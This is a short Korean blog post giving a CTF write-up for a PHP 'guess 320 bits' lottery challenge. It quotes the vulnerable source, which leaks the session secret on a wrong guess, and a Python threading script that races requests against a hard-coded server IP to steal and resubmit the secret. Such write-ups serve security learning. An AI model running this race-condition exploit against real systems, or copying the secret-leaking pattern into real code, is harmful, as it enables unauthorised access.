[ConfidenceCTF-teaser]Pratical-Numerology

문제

<?php function generate_secret() {        return sha1("123").sha1("123"); } session_start(); if(!isset($_SESSION['secret']))     $_SESSION['secret'] = generate_secret(); if(!isset($_POST['guess'])) {     echo 'Wanna play lotto? Just try to guess 320 bits.<br/><br/>'.PHP_EOL;     highlight_file(__FILE__);     exit; } $guess = $_POST['guess']; if($guess === $_SESSION['secret']) {     $flag = require('flag.php');     exit('Lucky bastard! You won the flag! ' . $flag); } //else... echo "Wrong! '{$_SESSION['secret']}' != '"; echo htmlspecialchars($guess); echo "'"; $_SESSION['secret'] = generate_secret();

풀이

: 쓰레드를 이용한 레이스 컨디션

#!/usr/bin/python import thread import httplib, urllib guess = "" def thread1():     global guess     headers = {"Content-type": "application/x-www-form-urlencoded",                "Cookie": "PHPSESSID=123cookie"                }     conn = httplib.HTTPConnection("134.213.136.172", 80)     conn.request("POST", "", "guess="+"A"*100000, headers)     guess = conn.getresponse().read(92)[8:88] def thread2():     global guess     headers = {"Content-type": "application/x-www-form-urlencoded",                "Cookie": "PHPSESSID=123cookie"                }          while guess=="":         pass     conn = httplib.HTTPConnection("134.213.136.172", 80)     conn.request("POST", "", "guess="+guess, headers)     response = conn.getresponse()     data = response.read()     print data     conn.close() thread.start_new_thread(thread2, ()) thread.start_new_thread(thread1, ())

 

먼가 블로그에 올려야 겠다는 생각은 맨날 하는데.. 귀차니즘 때문에 자세히 포스팅은 안하는거 같네염..